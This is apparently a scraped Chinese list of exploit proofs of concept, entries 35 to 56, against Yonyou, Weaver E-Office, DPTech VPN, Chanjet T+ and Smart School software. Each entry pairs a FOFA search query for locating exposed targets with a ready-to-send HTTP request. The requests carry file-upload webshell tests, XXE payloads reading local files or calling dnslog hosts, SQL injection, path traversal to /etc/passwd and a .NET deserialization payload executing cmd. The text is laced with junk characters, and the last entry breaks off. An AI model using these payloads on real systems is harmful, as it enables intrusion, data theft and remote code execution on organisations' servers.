35. 用友NC-Cloud importhttpscer任意文件上传" _3 `) D4 G2 m: b) q/ u4 j
FOFA:app="用友-NC-Cloud"
+ b- |# h! h. d5 E& {POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1$ [2 D; l7 e4 v; K; N1 U: g; A
Host: 203.25.218.166:88887 s& S5 c0 U" E) w- E' J% ]( s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info$ q. w- j7 g; V* i" d" B1 M
Accept-Encoding: gzip, deflate: B+ k' c2 b- X1 s* G' Q
Accept: */*
/ F) ~" }! P; o3 U( F5 r7 i( fConnection: close0 Z" V9 m& S' c
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA8 p {2 \; n! f( l0 w
Content-Length: 190* u/ b6 ~# W3 P# {1 {# M- Y& J
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0* W; T; o- f, j# u7 P
4 G3 O2 A# H7 A& l Y
--fd28cb44e829ed1c197ec3bc71748df0
+ A" D4 Y7 }0 k; ?( h+ r. UContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
. b5 A) w0 `$ F7 A7 @* O& T# C( n" I& ?
<%out.println(1111*1111);%>
* ]9 [" ~/ B0 n1 x } m--fd28cb44e829ed1c197ec3bc71748df0--
0 ^3 V% v. ], R& |. E7 X7 b/ t2 }- u! {( j! V$ \
( b8 n/ E9 j/ }9 L$ c* J$ O
36. 用友NC-Cloud soapFormat XXE1 J6 A, `* f+ R4 h8 q" G# |
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"( m7 \7 f/ ]$ f: {% e" S- K
POST /uapws/soapFormat.ajax HTTP/1.1- b$ Z! Z( `" g4 J0 F
Host: 192.168.40.130:8989! b$ ]" M( W6 w1 u a8 B6 t2 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
: n T2 Y+ K( q# z- @- sContent-Length: 2636 N+ m7 n, d& N9 E4 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ f$ O! Q* H5 G E5 H$ K2 _
Accept-Encoding: gzip, deflate
0 U, I) t/ `9 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- v4 x6 K& n) P0 t* |1 j
Connection: close% {, U. D w( P5 n2 a
Content-Type: application/x-www-form-urlencoded9 E ]" N' B7 h8 U5 D3 x1 ^, I
Upgrade-Insecure-Requests: 14 R6 `4 c2 X! f3 I' X. {* D& k" [8 J2 w
3 B6 X$ J8 b% x6 Jmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a" b( U" q3 J4 l9 B
9 T; {7 `# ~7 Z- k5 F4 C7 c9 C( }! Z- y& m$ J1 s8 b
37. 用友NC-Cloud IUpdateService XXE
( k- N5 n1 ?* [. JFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"+ {' l0 y7 Q, ?; Z( \/ u' n5 V$ ^
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
5 O m% E: f7 v, j& J7 CHost: 192.168.40.130:8989" x! E P, h/ s6 B: V1 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
6 Z1 O' t1 G `7 ~Content-Length: 421
, _3 c. U8 _" o' ?4 x0 j$ kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' ]: Q4 v* ]/ j1 g3 p
Accept-Encoding: gzip, deflate) u% ? A1 N& A( G9 e9 H
Accept-Language: zh-CN,zh;q=0.9" R2 a6 T1 m. l$ s8 L
Connection: close2 I+ u4 {" W# ^% i
Content-Type: text/xml;charset=UTF-8
5 _( u( k+ }6 Z8 c; X5 TSOAPAction: urn:getResult
: o$ g& v, m0 N$ s9 VUpgrade-Insecure-Requests: 17 l$ N6 D% ^: Y& k2 O3 \1 {
& D h L7 e/ Y' R3 ?
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
2 y* o- O+ f6 A. X<soapenv:Header/>
3 h# G0 ], `8 v O2 A$ |0 U<soapenv:Body>
U. J9 n/ e( t; E5 C/ U: [: k<iup:getResult>9 N' k. n6 f e1 p1 V
<!--type: string-->
; v5 e' t# ~$ S" @<iup:string><![CDATA[' @& o0 x( s j! |8 s
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
$ ?, |% E0 E; n' U& w' v/ h<xxx/>]]></iup:string>
1 L7 h g: V1 D2 ~2 U' p% P</iup:getResult>
& b! X: N3 o" P, K1 R- y</soapenv:Body>
2 D& `4 u R% e% N4 D! Q</soapenv:Envelope>, x$ p3 @* U7 B' `
) }) B% {2 s# ~/ T t+ J, I S! Z
% D8 z+ {' f7 `- g8 Z0 J1 D38. 用友U8 Cloud smartweb2.RPC.d XXE
- H( ]8 V% M1 Z* G# W1 W% ]FOFA:app="用友-U8-Cloud"
( N9 ]0 j2 ?5 L3 t5 g( W0 ]POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
: N a3 U0 _5 u) v1 u& ?+ NHost: 192.168.40.131:8088
( s/ [+ Z- k# ?9 ~6 v" wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
& _( R: L) K( u8 R2 l0 E1 eContent-Length: 260% O& ?3 H& k- D, O9 |/ w2 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$ H8 N2 W) L: [) y1 q$ s, N# ?& O% A
Accept-Encoding: gzip, deflate
% D0 p5 o/ \& b1 k% m6 DAccept-Language: zh-CN,zh;q=0.9
% g, z! n+ c, O2 }Connection: close7 V% Y; k3 a+ e# R8 Y5 `
Content-Type: application/x-www-form-urlencoded
$ ]: g g) Y) T$ J. G5 d0 S: ~/ q8 b+ U1 C0 g
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>7 Y; e0 |6 r+ ?% x
0 `3 u: t$ ~) q; R
- p$ w, m8 B' C39. 用友U8 Cloud RegisterServlet SQL注入
% T& m- M8 Y4 t1 H9 | FFOFA:title="u8c": w f3 v4 e& M
POST /servlet/RegisterServlet HTTP/1.1
0 Y& D* ~# G0 A3 C- HHost: 192.168.86.128:8089
6 q- ]! I! g5 B9 `- M# N9 ], L" _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36$ A4 c' \, |7 Y9 R: Q7 c
Connection: close, n) t' {9 X; z3 L( B
Content-Length: 855 p; L7 L: ?4 w5 h$ ?: ~# _; h
Accept: */*6 J5 z5 n2 b2 B+ Y1 D r
Accept-Language: en! f% j! [4 }9 w y
Content-Type: application/x-www-form-urlencoded+ U/ @& Z# k- Y
X-Forwarded-For: 127.0.0.1
7 b. q# K1 Q* S p: V; GAccept-Encoding: gzip- z# R4 f% S) l ]# {, Q
% y* j! I4 u4 O0 P* C" h* V; |
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
0 M* ^. B7 p, K# U% i# {2 k6 R9 y8 f4 I. r4 Z7 V+ c
5 f/ i! q8 F6 O! m3 }- V
40. 用友U8-Cloud XChangeServlet XXE- O: l7 g' h4 S4 e% c% K4 B4 i
FOFA:app="用友-U8-Cloud"
! i% H* `. X4 x* k8 Y cPOST /service/XChangeServlet HTTP/1.15 s* c, J9 R. a) x5 Q5 G7 u
Host: x.x.x.x
5 X* C/ [9 ~! ]" ], }4 ]0 V& QUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: ~5 D a6 i7 o# q( a, W5 gContent-Type: text/xml
' U( d2 m* {+ }1 \5 ^Connection: close
% H$ K8 A, W" `$ p+ |5 S6 a& c& z9 ^# k# P1 }3 k+ \
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
: V$ o$ A& y! V# F, X
/ G: P) l3 V& c& b0 c
* y3 n7 y" H" W/ f. ^% o8 P41. 用友U8 Cloud MeasureQueryByToolAction SQL注入+ o2 M r) ?- L7 I: V! |
FOFA:app="用友-U8-Cloud"
9 |! O- G4 q+ z- A# o3 q+ O3 bGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
0 R1 c' X8 Y6 L& y6 j' e# V9 {Host:: P0 }, _1 _6 W( S0 t( d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( r# m- n5 v3 Q( L" Y- [Content-Type: application/json6 ~3 Y$ B% v( O; x- q, ^5 X& c; K' S
Accept-Encoding: gzip* Z4 N ?1 F; Q# ~* i6 t8 p0 |
Connection: close
9 L- o6 J4 S' e# Y
1 M X! C# V. u# X/ T9 _
( E' b( m/ J, ?& W6 u42. 用友GRP-U8 SmartUpload01 文件上传
$ F# x* W) v# \FOFA:app="用友-GRP-U8"' h6 Y$ R- C. v
POST /u8qx/SmartUpload01.jsp HTTP/1.1( W5 s4 ?9 F1 i1 V7 s2 a
Host: x.x.x.x5 e3 h: d/ i. K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
; }' v! c% ?1 [0 S$ GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36, K( ^5 a1 d) h
$ b& O. R5 T9 R* k" k) v: G- d
PAYLOAD6 J6 W, W# i( I' w$ ?; z
( i$ _% a! t: X) e6 W: ]/ i5 f6 h* [
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
9 i! d' A' H3 Q9 m! c% I8 p5 F
' M! {- l+ P: F& c; {; b8 r4 p S% X43. 用友GRP-U8 userInfoWeb SQL注入致RCE( @7 U, p% E4 `
FOFA:app="用友-GRP-U8"# q# ^/ L0 [; V: w
POST /services/userInfoWeb HTTP/1.1
* c% P; G+ ~# PHost: your-ip& \& e5 V( a- P( {. f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.362 q; P5 I" Q5 E5 j+ u2 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 _: n o J# d3 u# N: [$ N2 @. H$ L
Accept-Encoding: gzip, deflate* j( I( E; R3 Z1 M& k! F
Accept-Language: zh-CN,zh;q=0.9
6 ?) [/ j& L( Y% fConnection: close% E @9 X* }" f1 i! X& a
SOAPAction:
) Z( L! @2 `! ?2 gContent-Type: text/xml;charset=UTF-8& s; |- G" K5 s$ g
2 o9 L( ?5 I* j! `* I
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
7 p3 r; C. o& f( P# g <soapenv:Header/>
6 _) `2 u: |7 ^: N <soapenv:Body>7 p& t# j# A/ a
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">0 x# E( G; C8 G- |
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>( E) N3 Z& p0 k, K$ X' ?2 _& c
</ser:getUserNameById>
7 ~) G% W1 |% q. F4 b' z! Z </soapenv:Body>3 M3 r, b, ^! e$ R, K$ |
</soapenv:Envelope>
& W! i# x% c; s0 C; a0 Q6 n1 n: q! g* u% M8 w+ C
; U: ~ O! T# i' h7 ^! R44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: K, U/ c3 F' h. ?5 K' L% B$ HFOFA:app="用友-GRP-U8"' w! L" u. }) \, S
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.14 Q7 o7 H/ ]" w0 {8 t
Host: your-ip
) u3 s3 y5 u' OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36/ A X" A) _0 g- Q6 _# c, B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 V, y2 d3 H1 C9 k4 M# XAccept-Encoding: gzip, deflate8 h; c) C* o( _% P
Accept-Language: zh-CN,zh;q=0.9
) Y1 r+ J- `$ Y( Z! s" V. L8 |Connection: close
1 u; W. ^0 q; |. w- v+ g y# A7 }* A1 Q. V
* ^3 k! U8 a, l3 R, u6 @$ ^0 v
45. 用友GRP-U8 ufgovbank XXE% b' L8 P2 G% {( m" i4 R9 U. x
FOFA:app="用友-GRP-U8"
5 t; m; S; J/ U& R* N( rPOST /ufgovbank HTTP/1.1& v9 T7 _) Z7 o; B
Host: 192.168.40.130:222
: |/ G, b$ C% B' ~6 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
. W* N% Z8 O7 Y3 ]Connection: close
' M2 _6 Y: o/ g" f/ jContent-Length: 161/ H/ u& P0 z! g0 H$ G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 B" F, H% R9 S) [6 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# }; s1 R* O) n5 ^" _2 d _$ N1 gContent-Type: application/x-www-form-urlencoded
t. N/ d. Z4 P" f% CAccept-Encoding: gzip4 T) U7 c9 S( m7 l
6 d9 `7 F/ J9 G( MreqData=<?xml version="1.0"?>
- K2 F* R. S4 h<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
d" i0 w2 p' @% f% p1 W
. i# d, v5 E$ A+ t; Y E, ?: }& b$ l! y# r! k1 w, ^
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% y2 N. |0 a' m' Q4 hFOFA:app="用友-GRP-U8"8 ~2 H6 `/ s* T! E' I$ x. r
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1- a ]# y" f3 a& d
Host: your-ip
4 Y# J* w6 q( F5 K9 o9 F5 F8 M4 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.361 F( D4 h, r# i* f9 n2 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 q' J: c: D k. J6 E5 ?( j
Accept-Encoding: gzip, deflate
" r6 k& m1 t9 v, `. m7 {Accept-Language: zh-CN,zh;q=0.9
& \0 z/ H" J# x; |& i' |Connection: close5 u+ s( X; ^% }5 \$ d9 x
" Z, {% o; T% |; M; w
! b) r( S8 \7 a8 L47. 用友GRP A++Cloud 政府财务云 任意文件读取
6 R0 }! z! I0 Q1 ^- ~% l mFOFA:body="/pf/portal/login/css/fonts/style.css"& {" ^% k2 X* `$ E8 m& @6 o- B6 w
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
, u/ f* z- N+ Z' ~1 w5 z, kHost: x.x.x.x
: @% c5 j+ S7 ~6 fCache-Control: max-age=09 G, z/ h* e& C( {1 {' K
Upgrade-Insecure-Requests: 1
: L% P+ f. d7 L) C. X) P5 X: \$ ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ J# O0 o3 W, l' W! S/ h9 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! F/ ?- J: w8 g3 g& N
Accept-Encoding: gzip, deflate, br/ b/ l" M, v4 _2 _# b5 ~
Accept-Language: zh-CN,zh;q=0.9
% w; p7 {9 {- S1 r! jIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
7 G0 l* k5 K4 i8 tConnection: close' P, @) b8 x; t9 q7 u6 ]( {
. {) b) D8 R W1 R
4 _6 X( q6 r& k0 ~
! N6 [' L- z" b/ a& l48. 用友U8 CRM swfupload 任意文件上传3 k) e7 s: V- F. n7 x
FOFA:title="用友U8CRM"
" {- }8 S' U q, S0 b( vPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
9 A; D$ R/ X& XHost: your-ip4 Y+ t* P- I) B$ c: E8 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ t8 R6 h ~6 e# |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 }+ @0 |5 m, R" s- N9 L: H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) [" d6 B8 J3 M$ a4 _( L
Accept-Encoding: gzip, deflate) m( }( j( D: ?1 p+ l
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855/ C; g- [0 a0 _) V F0 i9 {" s# p) I
------269520967239406871642430066855
" ^8 h3 i- _) A' c- KContent-Disposition: form-data; name="file"; filename="s.php"7 Z; R, }% [- f
1231
N! u {$ p4 D" w5 {3 zContent-Type: application/octet-stream* C; g. }3 a. e% M. \
------269520967239406871642430066855" U# V. u% v# q4 B8 z) p
Content-Disposition: form-data; name="upload"
2 u) ?4 {# ~! l [# K. `upload
, n4 k S& j1 G5 J) x------269520967239406871642430066855--; W/ `, b: l% r# E1 e% ~% w
0 I# y7 f# G/ o# S
2 R* w$ a, D6 F. i5 V& v6 a49. 用友U8 CRM系统uploadfile.php接口任意文件上传/ v+ x2 H8 P1 _
FOFA:body="用友U8CRM"6 E, z" w, q6 x# q5 l0 h: ^ v
8 C0 I. t9 X$ y8 i' U' p. XPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.16 @% L5 q/ j$ P$ c5 x
Host: x.x.x.x. s M0 f/ w9 p( J( b) J" e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- H. x$ H% E& X& S. C' E: U
Content-Length: 329$ W6 c0 b% g/ I2 a+ u. Q; e0 n, ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, S7 f$ ]4 L0 u! [2 y! M, mAccept-Encoding: gzip, deflate
$ @5 g8 \% @, w K, BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! A7 P; f3 i C0 x+ F! U* zConnection: close
; q$ l, V* R: k; C% o: k1 @5 P. ?$ kContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w. o) e# {/ k) B+ n( n
$ O0 F- q1 ~# u0 l-----------------------------vvv3wdayqv3yppdxvn3w9 f# j' S1 G1 [7 Z/ v0 g
Content-Disposition: form-data; name="file"; filename="%s.php "- B2 \ W- I. H! l- `" q( j. [
Content-Type: application/octet-stream2 P! p/ a2 o: J2 q5 S
( R1 H- }2 `0 [+ r& L
wersqqmlumloqa
( u& e6 K$ \" G* o2 p9 h-----------------------------vvv3wdayqv3yppdxvn3w
9 }5 n( @$ ?1 yContent-Disposition: form-data; name="upload"' f4 r; A, ] L5 }3 M; _; n, s
) i7 G9 Q- ]& J5 K+ \5 T+ _# _
upload& [9 s) Q" u) o# K* O. } ]
-----------------------------vvv3wdayqv3yppdxvn3w--, P( r: p7 g0 y: @: C4 ^
* V' H) G4 v# F, y# Z; b& t. P2 { W0 A: ]% u0 b" i c
http://x.x.x.x/tmpfile/updB3CB.tmp.php
# q! S' e! f- j' W" E' U" C7 }0 ^9 i% }* T& C
50. QDocs Smart School 6.4.1 filterRecords SQL注入
: C+ p# u6 J1 t1 F# mFOFA:body="close closebtnmodal"
( E6 ?# P s5 L% M+ mPOST /course/filterRecords/ HTTP/1.1
4 B% m( i d! m% BHost: x.x.x.x
) m' I3 I7 T9 M& m% UUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. V' L5 G- v! z( l& s& K
Connection: close; ?* [6 p; O! W9 t( q5 I8 D" y
Content-Length: 224# Z2 o3 i: J3 o
Accept: */*
0 [, A* a8 D5 Q2 B1 lAccept-Language: en
% y4 w8 D% {* kContent-Type: application/x-www-form-urlencoded
* F `& e5 b, {) q4 j* T# \- OAccept-Encoding: gzip
- b3 J9 W$ X) g/ R( Y' W y: v0 v/ P0 t
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1 c" U+ x+ Q2 e1 r
7 b7 Y5 A3 h5 C/ g7 E J/ ?' m6 U; ?, s7 @1 F
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
* D$ X$ A* C, W1 QFOFA:app="云时空社会化商业ERP系统"
& X/ E- r5 Z0 ?GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.15 U9 i* g& N) o8 s! Z
Host: your-ip
3 x. z/ F( R6 V' U2 [/ g' MUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36( Z; V s9 j2 m, K6 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
0 v. A& R! w5 f& n) TAccept-Encoding: gzip, deflate; `* s9 y4 j n# ~% e) p( g2 \
Accept-Language: zh-CN,zh;q=0.98 i$ D/ E; y5 [: D; Z
Connection: close+ X6 a9 {4 m% h, X% B4 e& M
( \. ~8 H9 |/ |5 c$ g' C A: W
# w1 p) p0 z2 Y! p% {, d8 o52. 泛微E-Office json_common.php sql注入
- q/ ~6 _8 |1 m7 f1 W3 k# MFOFA:app="泛微-EOffice"
8 C# g* o; n2 V( u+ EPOST /building/json_common.php HTTP/1.1
& V' k9 f5 e( g8 kHost: 192.168.86.128:8097
! c2 o6 ^7 g4 G% |: e" A& m7 \User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 F W; K* D9 o4 w4 I2 T% FConnection: close
* @- }7 b. e3 {0 h( S* M4 VContent-Length: 87& F" o4 u4 P; i3 }
Accept: */*
0 J! R7 p+ Y; B/ HAccept-Language: en$ E) q- q* y4 P6 P. }
Content-Type: application/x-www-form-urlencoded6 L8 e, Y7 j; W9 g" i @4 f
Accept-Encoding: gzip
8 J3 S" D# S+ r6 v% G T: |2 j- b+ g9 P8 i8 i1 s% b" V
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
6 b6 X( }& d0 K4 ]6 B: p5 F. A( D) x3 I) W
/ V& j+ g: U" q3 n53. 迪普 DPTech VPN Service 任意文件上传
9 d' h `/ o& W. d: m9 YFOFA:app="DPtech-SSLVPN"# T5 V$ L3 M+ j8 C" a4 l
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
# `+ |$ B3 n& z+ _. @2 _# Q
* V# w5 F( I z0 l. S+ G6 |: n
; U% j. C9 H1 @& N, L3 _( _54. 畅捷通T+ getstorewarehousebystore 远程代码执行
T& m# c" R) j, z3 O$ d! m0 SFOFA:app="畅捷通-TPlus"- h. M. D" R( ~7 h& J- I. Z
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
% Z. v6 q: b) n$ @* K. O"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
+ d) m2 _" G8 |+ F
6 _! w! V% v5 M% c# J
) Y; M$ j* W: } O8 x) W2 t8 W完整数据包
9 d& d6 z/ A/ m5 ]$ z5 ZPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
8 F" K+ T4 E6 ?% z+ h% S, h! y! fHost: x.x.x.x
' m+ ~* [, k" D# n2 ]: oUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
) J0 p$ C+ n2 r- Q) DContent-Length: 593& p% c: U' B% L: C W! G
5 [# G# C5 O& y, t. ^! w) M" l( g
{8 Z" M, P. N; e" j: B: u
"storeID":{
/ @/ a! C( U+ F, [) W. x "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",8 V7 ] d! h& k# i. [
"MethodName":"Start",
' M9 Q0 {. Q* W' @. @ "ObjectInstance":{2 `8 v3 t1 Z* F* r
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ B5 {2 f1 ^/ n. G8 _$ D/ O "StartInfo":{+ n0 N2 p. D3 b
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ t2 B7 @* R8 _# K* R Q "FileName":"cmd",
0 G5 H6 B0 @: u* Z "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt" A& Y5 \* t# C8 l+ d
}3 G+ D+ _9 R- ^6 q( W- Z
} ~. ?- g Z/ ?9 F4 I0 m% z! X. ]/ i
}
: D: j, g9 I# f" W}% m6 Y& {) c( O+ R0 n- J
# O l& y5 |- Z7 u2 E. E
" |6 [8 D( |' o3 e/ I第二步,访问如下url
, v" ?( a) D3 C9 [( a8 D/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
4 V; z e/ r# m* {8 m/ W: k
0 p/ Y+ d! R1 m7 [8 u: Z% E" a& N- l& B( N" L6 c* ^
55. 畅捷通T+ getdecallusers信息泄露
' x+ A, p# a5 z) ]" |" m! s5 nFOFA:app="畅捷通-TPlus"
+ X8 N' w* ], @+ o( L) B第一步,通过
* J* w. c H G+ E6 S' p/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie/ I! ~, ]. r* O
第二步,利用获取到的Cookie请求: w$ \2 w, W5 m$ I
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
$ D7 U) y8 q4 M& e" D+ g _5 J- d! z) i0 O6 C
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE! f! ^5 _2 s" c. `1 U# q! ]
FOFA: app="畅捷通-TPlus", _- d( z2 U* e# t
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1& p* m$ D- ~- u p7 D) i# W: c
Host: x.x.x.x
